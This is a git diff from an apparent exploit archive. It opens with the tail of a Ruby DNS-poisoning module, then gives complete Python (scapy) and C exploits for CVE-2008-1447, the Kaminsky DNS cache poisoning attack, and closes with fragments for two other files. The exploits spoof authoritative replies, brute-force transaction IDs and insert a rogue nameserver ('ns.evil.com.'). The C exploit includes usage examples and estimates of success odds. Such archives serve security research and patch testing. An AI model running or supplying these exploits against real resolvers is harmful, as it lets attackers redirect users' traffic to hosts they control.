check and see if the target is poisoned... + if queries % 250 == 0 + begin + query = Resolv::DNS::Message.new + query.add_question(domain, Resolv::DNS::Resource::IN::NS) + query.rd = 0 + + srv_sock.put(query.encode) + answer, addr = srv_sock.recvfrom() + + if answer and answer.length > 0 + answer = Resolv::DNS::Message.decode(answer) + answer.each_answer do |name, ttl, data| + if((name.to_s + ".") == domain and data.name.to_s == newdns) + print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}") + srv_sock.close + disconnect_ip + return + end + end + end + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}") + end + end + + end + + end + +end +end + +# milw0rm.com [2008-07-23] diff --git a/platforms/multiple/remote/6123.py b/platforms/multiple/remote/6123.py index cc94de272..9a5b4c54c 100755 --- a/platforms/multiple/remote/6123.py +++ b/platforms/multiple/remote/6123.py 
@@ -1,112 +1,112 @@ -from scapy import * -import random - -# Copyright (C) 2008 Julien Desfossez -# http://www.solisproject.net/ -# -# This program is free software; you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation; either version 2 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA - -# This script exploit the flaw discovered by Dan Kaminsky -# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 -# http://www.kb.cert.org/vuls/id/800113 - -# It tries to insert a dummy record in the vulnerable DNS server by guessing -# the transaction ID. -# It also insert Authority record for a valid record of the target domain. - -# To use this script, you have to discover the source port used by the vulnerable -# DNS server. -# Python is really slow, so it will take some time, but it works :-) - - -# IP to insert for our dummy record -targetip = "X.X.X.X" -# Vulnerable recursive DNS server -targetdns = "X.X.X.X" -# Authoritative NS for the target domain -srcdns = ["X.X.X.X"] - -# Domain to play with -dummydomain = "" -basedomain = ".example.com." -# sub-domain to claim authority on -domain = "sub.example.com." -# Spoofed authoritative DNS for the sub-domain -spoof="ns.evil.com." 
-# src port of vulnerable DNS for recursive queries -dnsport = 32883 - -# base packet -rep = IP(dst=targetdns, src=srcdns[0])/ \ - UDP(sport=53, dport=dnsport)/ \ - DNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, - qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), - an=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4), - ns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2) - ) - - -currentid = 1024 -dummyid = 3 -while 1: - dummydomain = "a" + str(dummyid) + basedomain - dummyid = dummyid + 1 - # request for our dummydomain - req = IP(dst=targetdns)/ \ - UDP(sport=random.randint(1025, 65000), dport=53)/ \ - DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, - qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), - an=0, - ns=0, - ar=0 - ) - send(req) - - # build the response - rep.getlayer(DNS).qd.qname = dummydomain - rep.getlayer(DNS).an.rrname = dummydomain - - for i in range(50): - # TXID - rep.getlayer(DNS).id = currentid - currentid = currentid + 1 - if currentid == 65536: - currentid = 1024 - - # len and chksum - rep.getlayer(UDP).len = IP(str(rep)).len-20 - rep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload)) - - print "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain) - send(rep, verbose=0) - - # check to see if it worked - req = IP(dst=targetdns)/ \ - UDP(sport=random.randint(1025, 65000), dport=53)/ \ - DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, - qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), - an=0, - ns=0, - ar=0 - ) - z = sr1(req, timeout=2, retry=0, verbose=0) - try: - if z[DNS].an.rdata == targetip: - print "Successfully poisonned our target with a dummy record !!" 
- break - except: - print "Poisonning failed" - -# milw0rm.com [2008-07-24] +from scapy import * +import random + +# Copyright (C) 2008 Julien Desfossez +# http://www.solisproject.net/ +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + +# This script exploit the flaw discovered by Dan Kaminsky +# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 +# http://www.kb.cert.org/vuls/id/800113 + +# It tries to insert a dummy record in the vulnerable DNS server by guessing +# the transaction ID. +# It also insert Authority record for a valid record of the target domain. + +# To use this script, you have to discover the source port used by the vulnerable +# DNS server. +# Python is really slow, so it will take some time, but it works :-) + + +# IP to insert for our dummy record +targetip = "X.X.X.X" +# Vulnerable recursive DNS server +targetdns = "X.X.X.X" +# Authoritative NS for the target domain +srcdns = ["X.X.X.X"] + +# Domain to play with +dummydomain = "" +basedomain = ".example.com." +# sub-domain to claim authority on +domain = "sub.example.com." +# Spoofed authoritative DNS for the sub-domain +spoof="ns.evil.com." 
+# src port of vulnerable DNS for recursive queries +dnsport = 32883 + +# base packet +rep = IP(dst=targetdns, src=srcdns[0])/ \ + UDP(sport=53, dport=dnsport)/ \ + DNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, + qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), + an=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4), + ns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2) + ) + + +currentid = 1024 +dummyid = 3 +while 1: + dummydomain = "a" + str(dummyid) + basedomain + dummyid = dummyid + 1 + # request for our dummydomain + req = IP(dst=targetdns)/ \ + UDP(sport=random.randint(1025, 65000), dport=53)/ \ + DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, + qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), + an=0, + ns=0, + ar=0 + ) + send(req) + + # build the response + rep.getlayer(DNS).qd.qname = dummydomain + rep.getlayer(DNS).an.rrname = dummydomain + + for i in range(50): + # TXID + rep.getlayer(DNS).id = currentid + currentid = currentid + 1 + if currentid == 65536: + currentid = 1024 + + # len and chksum + rep.getlayer(UDP).len = IP(str(rep)).len-20 + rep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload)) + + print "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain) + send(rep, verbose=0) + + # check to see if it worked + req = IP(dst=targetdns)/ \ + UDP(sport=random.randint(1025, 65000), dport=53)/ \ + DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, + qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), + an=0, + ns=0, + ar=0 + ) + z = sr1(req, timeout=2, retry=0, verbose=0) + try: + if z[DNS].an.rdata == targetip: + print "Successfully poisonned our target with a dummy record !!" + break + except: + print "Poisonning failed" + +# milw0rm.com [2008-07-24] diff --git a/platforms/multiple/remote/6130.c b/platforms/multiple/remote/6130.c index 99d798b4b..99b8008f4 100755 
--- a/platforms/multiple/remote/6130.c
+++ b/platforms/multiple/remote/6130.c
@@ -1,364 +1,364 @@ -/* - * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack - * - * Compilation: - * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm - * - * Dependency: libdnet (aka libdumbnet-dev under Ubuntu) - * - * Author: marc.bevand at rapid7 dot com - */ - -#define _BSD_SOURCE - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define DNSF_RESPONSE (1<<15) -#define DNSF_AUTHORITATIVE (1<<10) -#define DNSF_REC_DESIRED (1<<8) -#define DNSF_REC_AVAILABLE (1<<7) - -#define TYPE_A 0x1 -#define TYPE_NS 0x2 -#define CLASS_IN 0x1 - -struct dns_pkt -{ - uint16_t txid; - uint16_t flags; - uint16_t nr_quest; - uint16_t nr_ans; - uint16_t nr_auth; - uint16_t nr_add; -} __attribute__ ((__packed__)); - -void format_domain(u_char *buf, unsigned size, unsigned *len, const char *name) -{ - unsigned bufi, i, j; - bufi = i = j = 0; - while (name[i]) - { - if (name[i] == '.') - { - if (bufi + 1 + (i - j) > size) - fprintf(stderr, "format_domain overflow\n"), exit(1); - buf[bufi++] = i - j; - memcpy(buf + bufi, name + j, i - j); - bufi += i - j; - j = i + 1; - } - i++; - } - if (bufi + 1 + 2 + 2 > size) - fprintf(stderr, "format_domain overflow\n"), exit(1); - buf[bufi++] = 0; - *len = bufi; -} - -void format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class) -{ - uint16_t tmp; - // name - format_domain(buf, size, len, name); - // type - tmp = htons(type); - memcpy(buf + *len, &tmp, sizeof (tmp)); - *len += sizeof (tmp); - // class - tmp = htons(class); - memcpy(buf + *len, &tmp, sizeof (tmp)); - *len += sizeof (tmp); -} - -void format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data) -{ - format_qr(buf, size, len, name, type, class); - // ttl - ttl = htonl(ttl); - memcpy(buf + *len, &ttl, sizeof (ttl)); - *len += sizeof (ttl); - // data length + data - uint16_t dlen; - struct addr 
addr; - switch (type) - { - case TYPE_A: - dlen = sizeof (addr.addr_ip); - break; - case TYPE_NS: - dlen = strlen(data) + 1; - break; - default: - fprintf(stderr, "format_rr: unknown type %02x", type); - exit(1); - } - dlen = htons(dlen); - memcpy(buf + *len, &dlen, sizeof (dlen)); - *len += sizeof (dlen); - // data - unsigned len2; - switch (type) - { - case TYPE_A: - if (addr_aton(data, &addr) < 0) - fprintf(stderr, "invalid destination IP: %s", data), exit(1); - memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip)); - *len += sizeof (addr.addr_ip); - break; - case TYPE_NS: - format_domain(buf + *len, size - *len, &len2, data); - *len += len2; - break; - default: - fprintf(stderr, "format_rr: unknown type %02x", type); - exit(1); - } -} - -void dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name) -{ - u_char *out = buf; - struct dns_pkt p = { - .txid = htons(txid), - .flags = htons(flags), - .nr_quest = htons(1), - .nr_ans = htons(0), - .nr_auth = htons(0), - .nr_add = htons(0), - }; - u_char qr[256]; - unsigned l; - format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN); - if (sizeof (p) + l > size) - fprintf(stderr, "dns_query overflow"), exit(1); - memcpy(out, &p, sizeof (p)); - out += sizeof (p); - memcpy(out, qr, l); - out += l; - *len = sizeof (p) + l; -} - -void dns_response(u_char *buf, unsigned size, unsigned *len, - uint16_t txid, uint16_t flags, - const char *q_name, const char *q_ip, - const char *domain, const char *auth_name, const char *auth_ip) -{ - u_char *out = buf; - u_char *end = buf + size; - u_char rec[256]; - unsigned l_rec; - uint32_t ttl = 24*3600; - struct dns_pkt p = { - .txid = htons(txid), - .flags = htons(flags), - .nr_quest = htons(1), - .nr_ans = htons(1), - .nr_auth = htons(1), - .nr_add = htons(1), - }; - (void)domain; - *len = 0; - if (out + *len + sizeof (p) > end) - fprintf(stderr, "dns_response overflow"), exit(1); - memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p); - 
// queries - format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN); - if (out + *len + l_rec > end) - fprintf(stderr, "dns_response overflow"), exit(1); - memcpy(out + *len, rec, l_rec); *len += l_rec; - // answers - format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN, - ttl, q_ip); - if (out + *len + l_rec > end) - fprintf(stderr, "dns_response overflow"), exit(1); - memcpy(out + *len, rec, l_rec); *len += l_rec; - // authoritative nameservers - format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN, - ttl, auth_name); - if (out + *len + l_rec > end) - fprintf(stderr, "dns_response overflow"), exit(1); - memcpy(out + *len, rec, l_rec); *len += l_rec; - // additional records - format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN, - ttl, auth_ip); - if (out + *len + l_rec > end) - fprintf(stderr, "dns_response overflow"), exit(1); - memcpy(out + *len, rec, l_rec); *len += l_rec; -} - -unsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name) -{ - unsigned len = 0; - // ip - struct ip_hdr *ip = (struct ip_hdr *)buf; - ip->ip_hl = 5; - ip->ip_v = 4; - ip->ip_tos = 0; - ip->ip_id = rand() & 0xffff; - ip->ip_off = 0; - ip->ip_ttl = IP_TTL_MAX; - ip->ip_p = 17; // udp - ip->ip_sum = 0; - struct addr addr; - if (addr_aton(srcip, &addr) < 0) - fprintf(stderr, "invalid source IP: %s", srcip), exit(1); - ip->ip_src = addr.addr_ip; - if (addr_aton(dstip, &addr) < 0) - fprintf(stderr, "invalid destination IP: %s", dstip), exit(1); - ip->ip_dst = addr.addr_ip; - // udp - struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); - udp->uh_sport = htons(1234); - udp->uh_dport = htons(53); - // dns - dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN, - (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, - rand(), DNSF_REC_DESIRED, name); - // udp len - len += UDP_HDR_LEN; - udp->uh_ulen = htons(len); - // ip len & cksum - len += IP_HDR_LEN; - ip->ip_len = htons(len); - ip_checksum(buf, len); - return len; -} 
- -unsigned build_response(u_char *buf, const char *srcip, const char *dstip, - uint16_t port_resolver, uint16_t txid, - const char *q_name, const char *q_ip, - const char *domain, const char *auth_name, const char *auth_ip) -{ - unsigned len = 0; - // ip - struct ip_hdr *ip = (struct ip_hdr *)buf; - ip->ip_hl = 5; - ip->ip_v = 4; - ip->ip_tos = 0; - ip->ip_id = rand() & 0xffff; - ip->ip_off = 0; - ip->ip_ttl = IP_TTL_MAX; - ip->ip_p = 17; // udp - ip->ip_sum = 0; - struct addr addr; - if (addr_aton(srcip, &addr) < 0) - fprintf(stderr, "invalid source IP: %s", srcip), exit(1); - ip->ip_src = addr.addr_ip; - if (addr_aton(dstip, &addr) < 0) - fprintf(stderr, "invalid destination IP: %s", dstip), exit(1); - ip->ip_dst = addr.addr_ip; - // udp - struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); - udp->uh_sport = htons(53); - udp->uh_dport = htons(port_resolver); - // dns - dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN, - (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, - txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE, - q_name, q_ip, domain, auth_name, auth_ip); - // udp len - len += UDP_HDR_LEN; - udp->uh_ulen = htons(len); - // ip len & cksum - len += IP_HDR_LEN; - ip->ip_len = htons(len); - ip_checksum(buf, len); - return len; -} - -void usage(char *name) -{ - fprintf(stderr, "Usage: %s " - " \n" - " Source IP used when sending queries for random hostnames\n" - " (typically your IP)\n" - " Target DNS resolver to attack\n" - " One of the authoritative DNS servers for \n" - " Source port used by the resolver when forwarding queries\n" - " Poison the cache with the A record .\n" - " Domain name, see .\n" - " IP of your choice to be associated to .\n" - " Number of poisoning attemps, more attempts increase the\n" - " chance of successful poisoning, but also the attack time\n" - " Number of spoofed replies to send per attempt, more replies\n" - " increase the chance of successful poisoning but, but also\n" - " the rate of packet loss\n" - "Example:\n" - " 
$ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\n" - "This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\n" - "in r.r.r.r's cache. The chance of successfully poisoning the resolver with\n" - "this example (8192 attempts and 16 replies/attempt) is 86%%\n" - "(1-(1-16/65536)**8192). This example also requires a bandwidth of about\n" - "2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\n" - "8 bits/byte) and takes about 80 secs to complete (8192 attempts /\n" - "100 attempts/sec).\n", - name, name); -} - -int main(int argc, char **argv) -{ - if (argc != 10) - usage(argv[0]), exit(1); - const char *querier = argv[1]; - const char *ip_resolver = argv[2]; - const char *ip_authoritative = argv[3]; - uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0); - const char *subhost = argv[5]; - const char *domain = argv[6]; - const char *anyip = argv[7]; - uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0); - uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0); - if (domain[strlen(domain) - 1 ] != '.') - fprintf(stderr, "domain must end with dot(.): %s\n", domain), exit(1); - printf("Chance of success: 1-(1-%d/65536)**%d = %.2f\n", replies, attempts, 1 - pow((1 - replies / 65536.), attempts)); - srand(time(NULL)); - int unique = rand() + (rand() << 16); - u_char buf[IP_LEN_MAX]; - unsigned len; - char name[256]; - char ns[256]; - ip_t *iph; - if ((iph = ip_open()) == NULL) - err(1, "ip_open"); - int cnt = 0; - while (cnt < attempts) - { - // send a query for a random hostname - snprintf(name, sizeof (name), "%08x%08x.%s", unique, cnt, domain); - len = build_query(buf, querier, ip_resolver, name); - if (ip_send(iph, buf, len) != len) - err(1, "ip_send"); - // give the resolver enough time to forward the query and be in a state - // where it waits for answers; sleeping 10ms here limits the number of - // attempts to 100 per sec - usleep(10000); - // send spoofed replies, each reply contains: - // - 
1 query: query for the "random hostname" - // - 1 answer: "random hostname" A 1.1.1.1 - // - 1 authoritative nameserver: NS . - // - 1 additional record: . A - snprintf(ns, sizeof (ns), "%s.%s", subhost, domain); - unsigned r; - for (r = 0; r < replies; r++) - { - // use a txid that is just 'r': 0..(replies-1) - len = build_response(buf, ip_authoritative, ip_resolver, - port_resolver, r, name, "1.1.1.1", domain, ns, anyip); - if (ip_send(iph, buf, len) != len) - err(1, "ip_send"); - } - cnt++; - } - ip_close(iph); - return 0; -} - -// milw0rm.com [2008-07-25] +/* + * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack + * + * Compilation: + * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm + * + * Dependency: libdnet (aka libdumbnet-dev under Ubuntu) + * + * Author: marc.bevand at rapid7 dot com + */ + +#define _BSD_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define DNSF_RESPONSE (1<<15) +#define DNSF_AUTHORITATIVE (1<<10) +#define DNSF_REC_DESIRED (1<<8) +#define DNSF_REC_AVAILABLE (1<<7) + +#define TYPE_A 0x1 +#define TYPE_NS 0x2 +#define CLASS_IN 0x1 + +struct dns_pkt +{ + uint16_t txid; + uint16_t flags; + uint16_t nr_quest; + uint16_t nr_ans; + uint16_t nr_auth; + uint16_t nr_add; +} __attribute__ ((__packed__)); + +void format_domain(u_char *buf, unsigned size, unsigned *len, const char *name) +{ + unsigned bufi, i, j; + bufi = i = j = 0; + while (name[i]) + { + if (name[i] == '.') + { + if (bufi + 1 + (i - j) > size) + fprintf(stderr, "format_domain overflow\n"), exit(1); + buf[bufi++] = i - j; + memcpy(buf + bufi, name + j, i - j); + bufi += i - j; + j = i + 1; + } + i++; + } + if (bufi + 1 + 2 + 2 > size) + fprintf(stderr, "format_domain overflow\n"), exit(1); + buf[bufi++] = 0; + *len = bufi; +} + +void format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class) +{ + uint16_t tmp; + // name + format_domain(buf, size, len, 
name); + // type + tmp = htons(type); + memcpy(buf + *len, &tmp, sizeof (tmp)); + *len += sizeof (tmp); + // class + tmp = htons(class); + memcpy(buf + *len, &tmp, sizeof (tmp)); + *len += sizeof (tmp); +} + +void format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data) +{ + format_qr(buf, size, len, name, type, class); + // ttl + ttl = htonl(ttl); + memcpy(buf + *len, &ttl, sizeof (ttl)); + *len += sizeof (ttl); + // data length + data + uint16_t dlen; + struct addr addr; + switch (type) + { + case TYPE_A: + dlen = sizeof (addr.addr_ip); + break; + case TYPE_NS: + dlen = strlen(data) + 1; + break; + default: + fprintf(stderr, "format_rr: unknown type %02x", type); + exit(1); + } + dlen = htons(dlen); + memcpy(buf + *len, &dlen, sizeof (dlen)); + *len += sizeof (dlen); + // data + unsigned len2; + switch (type) + { + case TYPE_A: + if (addr_aton(data, &addr) < 0) + fprintf(stderr, "invalid destination IP: %s", data), exit(1); + memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip)); + *len += sizeof (addr.addr_ip); + break; + case TYPE_NS: + format_domain(buf + *len, size - *len, &len2, data); + *len += len2; + break; + default: + fprintf(stderr, "format_rr: unknown type %02x", type); + exit(1); + } +} + +void dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name) +{ + u_char *out = buf; + struct dns_pkt p = { + .txid = htons(txid), + .flags = htons(flags), + .nr_quest = htons(1), + .nr_ans = htons(0), + .nr_auth = htons(0), + .nr_add = htons(0), + }; + u_char qr[256]; + unsigned l; + format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN); + if (sizeof (p) + l > size) + fprintf(stderr, "dns_query overflow"), exit(1); + memcpy(out, &p, sizeof (p)); + out += sizeof (p); + memcpy(out, qr, l); + out += l; + *len = sizeof (p) + l; +} + +void dns_response(u_char *buf, unsigned size, unsigned *len, + uint16_t txid, uint16_t flags, + const char 
*q_name, const char *q_ip, + const char *domain, const char *auth_name, const char *auth_ip) +{ + u_char *out = buf; + u_char *end = buf + size; + u_char rec[256]; + unsigned l_rec; + uint32_t ttl = 24*3600; + struct dns_pkt p = { + .txid = htons(txid), + .flags = htons(flags), + .nr_quest = htons(1), + .nr_ans = htons(1), + .nr_auth = htons(1), + .nr_add = htons(1), + }; + (void)domain; + *len = 0; + if (out + *len + sizeof (p) > end) + fprintf(stderr, "dns_response overflow"), exit(1); + memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p); + // queries + format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN); + if (out + *len + l_rec > end) + fprintf(stderr, "dns_response overflow"), exit(1); + memcpy(out + *len, rec, l_rec); *len += l_rec; + // answers + format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN, + ttl, q_ip); + if (out + *len + l_rec > end) + fprintf(stderr, "dns_response overflow"), exit(1); + memcpy(out + *len, rec, l_rec); *len += l_rec; + // authoritative nameservers + format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN, + ttl, auth_name); + if (out + *len + l_rec > end) + fprintf(stderr, "dns_response overflow"), exit(1); + memcpy(out + *len, rec, l_rec); *len += l_rec; + // additional records + format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN, + ttl, auth_ip); + if (out + *len + l_rec > end) + fprintf(stderr, "dns_response overflow"), exit(1); + memcpy(out + *len, rec, l_rec); *len += l_rec; +} + +unsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name) +{ + unsigned len = 0; + // ip + struct ip_hdr *ip = (struct ip_hdr *)buf; + ip->ip_hl = 5; + ip->ip_v = 4; + ip->ip_tos = 0; + ip->ip_id = rand() & 0xffff; + ip->ip_off = 0; + ip->ip_ttl = IP_TTL_MAX; + ip->ip_p = 17; // udp + ip->ip_sum = 0; + struct addr addr; + if (addr_aton(srcip, &addr) < 0) + fprintf(stderr, "invalid source IP: %s", srcip), exit(1); + ip->ip_src = addr.addr_ip; + if (addr_aton(dstip, &addr) < 
0) + fprintf(stderr, "invalid destination IP: %s", dstip), exit(1); + ip->ip_dst = addr.addr_ip; + // udp + struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); + udp->uh_sport = htons(1234); + udp->uh_dport = htons(53); + // dns + dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN, + (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, + rand(), DNSF_REC_DESIRED, name); + // udp len + len += UDP_HDR_LEN; + udp->uh_ulen = htons(len); + // ip len & cksum + len += IP_HDR_LEN; + ip->ip_len = htons(len); + ip_checksum(buf, len); + return len; +} + +unsigned build_response(u_char *buf, const char *srcip, const char *dstip, + uint16_t port_resolver, uint16_t txid, + const char *q_name, const char *q_ip, + const char *domain, const char *auth_name, const char *auth_ip) +{ + unsigned len = 0; + // ip + struct ip_hdr *ip = (struct ip_hdr *)buf; + ip->ip_hl = 5; + ip->ip_v = 4; + ip->ip_tos = 0; + ip->ip_id = rand() & 0xffff; + ip->ip_off = 0; + ip->ip_ttl = IP_TTL_MAX; + ip->ip_p = 17; // udp + ip->ip_sum = 0; + struct addr addr; + if (addr_aton(srcip, &addr) < 0) + fprintf(stderr, "invalid source IP: %s", srcip), exit(1); + ip->ip_src = addr.addr_ip; + if (addr_aton(dstip, &addr) < 0) + fprintf(stderr, "invalid destination IP: %s", dstip), exit(1); + ip->ip_dst = addr.addr_ip; + // udp + struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); + udp->uh_sport = htons(53); + udp->uh_dport = htons(port_resolver); + // dns + dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN, + (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, + txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE, + q_name, q_ip, domain, auth_name, auth_ip); + // udp len + len += UDP_HDR_LEN; + udp->uh_ulen = htons(len); + // ip len & cksum + len += IP_HDR_LEN; + ip->ip_len = htons(len); + ip_checksum(buf, len); + return len; +} + +void usage(char *name) +{ + fprintf(stderr, "Usage: %s " + " \n" + " Source IP used when sending queries for random hostnames\n" + " (typically your IP)\n" + " Target DNS resolver 
to attack\n" + " One of the authoritative DNS servers for \n" + " Source port used by the resolver when forwarding queries\n" + " Poison the cache with the A record .\n" + " Domain name, see .\n" + " IP of your choice to be associated to .\n" + " Number of poisoning attemps, more attempts increase the\n" + " chance of successful poisoning, but also the attack time\n" + " Number of spoofed replies to send per attempt, more replies\n" + " increase the chance of successful poisoning but, but also\n" + " the rate of packet loss\n" + "Example:\n" + " $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\n" + "This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\n" + "in r.r.r.r's cache. The chance of successfully poisoning the resolver with\n" + "this example (8192 attempts and 16 replies/attempt) is 86%%\n" + "(1-(1-16/65536)**8192). This example also requires a bandwidth of about\n" + "2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\n" + "8 bits/byte) and takes about 80 secs to complete (8192 attempts /\n" + "100 attempts/sec).\n", + name, name); +} + +int main(int argc, char **argv) +{ + if (argc != 10) + usage(argv[0]), exit(1); + const char *querier = argv[1]; + const char *ip_resolver = argv[2]; + const char *ip_authoritative = argv[3]; + uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0); + const char *subhost = argv[5]; + const char *domain = argv[6]; + const char *anyip = argv[7]; + uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0); + uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0); + if (domain[strlen(domain) - 1 ] != '.') + fprintf(stderr, "domain must end with dot(.): %s\n", domain), exit(1); + printf("Chance of success: 1-(1-%d/65536)**%d = %.2f\n", replies, attempts, 1 - pow((1 - replies / 65536.), attempts)); + srand(time(NULL)); + int unique = rand() + (rand() << 16); + u_char buf[IP_LEN_MAX]; + unsigned len; + char name[256]; + char ns[256]; + ip_t *iph; + if ((iph = 
ip_open()) == NULL)
+ err(1, "ip_open");
+ int cnt = 0;
+ while (cnt < attempts)
+ {
+ // send a query for a random hostname
+ snprintf(name, sizeof (name), "%08x%08x.%s", unique, cnt, domain);
+ len = build_query(buf, querier, ip_resolver, name);
+ if (ip_send(iph, buf, len) != len)
+ err(1, "ip_send");
+ // give the resolver enough time to forward the query and be in a state
+ // where it waits for answers; sleeping 10ms here limits the number of
+ // attempts to 100 per sec
+ usleep(10000);
+ // send spoofed replies, each reply contains:
+ // - 1 query: query for the "random hostname"
+ // - 1 answer: "random hostname" A 1.1.1.1
+ // - 1 authoritative nameserver: NS .
+ // - 1 additional record: . A
+ snprintf(ns, sizeof (ns), "%s.%s", subhost, domain);
+ unsigned r;
+ for (r = 0; r < replies; r++)
+ {
+ // use a txid that is just 'r': 0..(replies-1)
+ len = build_response(buf, ip_authoritative, ip_resolver,
+ port_resolver, r, name, "1.1.1.1", domain, ns, anyip);
+ if (ip_send(iph, buf, len) != len)
+ err(1, "ip_send");
+ }
+ cnt++;
+ }
+ ip_close(iph);
+ return 0;
+}
+
+// milw0rm.com [2008-07-25]
diff --git a/platforms/multiple/remote/689.pl b/platforms/multiple/remote/689.pl
index fc0640575..5b57c356c 100755
--- a/platforms/multiple/remote/689.pl
+++ b/platforms/multiple/remote/689.pl
@@ -94,6 +94,6 @@ EOT } exit 0; }
-}
-
-# milw0rm.com [2004-12-15]
+}
+
+# milw0rm.com [2004-12-15]
diff --git a/platforms/multiple/remote/7760.php b/platforms/multiple/remote/7760.php
index a910079f8..f5e7a3624 100755
